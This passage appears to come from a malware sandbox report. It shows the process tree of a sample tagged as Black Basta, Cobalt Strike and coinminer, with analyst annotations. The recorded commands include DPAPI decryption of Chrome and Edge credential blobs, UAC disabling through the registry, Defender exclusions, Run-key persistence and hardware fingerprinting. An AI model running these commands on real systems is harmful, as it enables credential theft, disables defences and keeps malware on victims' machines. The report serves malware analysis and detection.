        5⤵
        
        PID:2136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:4516
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:2228
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5432
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:6128
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        
        PID:748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:1096
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:1728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:5852
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        Adds Run key to start application
        
        PID:3432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.lYyzZUTglh""
      4⤵
      PID:3464
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.lYyzZUTglh"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:4108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:5216
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:3104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:1920
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:1564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:5604
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:2904
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:4444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:5440
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:976
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:5752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:4036
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:4092
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:5764
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:2928
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
- Checks computer location settings
- Modifies registry class
PID:4152
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  - Checks computer location settings
  PID:1696
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    - Checks computer location settings
    - Loads dropped DLL
    - Drops file in System32 directory
    PID:3520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\sd2Ka5PwWF.ps1""
      4⤵
      PID:5648
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\sd2Ka5PwWF.ps1"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5088
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tum3j24d\tum3j24d.cmdline"
        6⤵
        
        PID:4808
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES90F5.tmp" "c:\Users\Admin\AppData\Local\Temp\tum3j24d\CSC986B11956D6D4426AED43812A855BAF5.TMP"
        7⤵
        
        PID:5028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:5420
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:4804
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:2340
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:4692
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:5484
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:1760
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
      4⤵
      PID:1252
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        
        PID:3744
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:3704
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:4008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
      4⤵
      PID:2948
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
        5⤵
        Adds Run key to start application
        
        PID:3100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.bQOqI9lPh6""
      4⤵
      PID:4152
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.bQOqI9lPh6"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
      4⤵
      PID:3488
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:4492
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:1288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      PID:884
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:2040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
      4⤵
      PID:2100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:6120
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:6064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:5132
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:5456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:3336
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:5332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:3800
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:4460
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:5840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:3020
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:1568

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:4904

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Update.vbs
1⤵
- Checks computer location settings
- Modifies registry class
PID:452
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Update.vbs"
  2⤵
  - Checks computer location settings
  PID:3784
- - C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-04_c64d9334ce39e9bfb033f9f26f4c5f8b_black-basta_cobalt-strike_coinminer_satacom_zxxz.exe"
    3⤵
    - Blocklisted process makes network request
    - Checks computer location settings
    - Loads dropped DLL
    - Drops file in System32 directory
    PID:1512
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pXjugyZS9Q.ps1""
      4⤵
      PID:5500
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pXjugyZS9Q.ps1"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2452
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3z55kaxy\3z55kaxy.cmdline"
        6⤵
        
        PID:1048
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D49.tmp" "c:\Users\Admin\AppData\Local\Temp\3z55kaxy\CSCDA68A68B79924EF5B5E47C8185658565.TMP"
        7⤵
        
        PID:4352
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      PID:5316
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        
        PID:5932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:2464
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:5996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      PID:4360
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        
        PID:4164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:4520
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4108
  - - C:\Windows\system32\cmd.exe
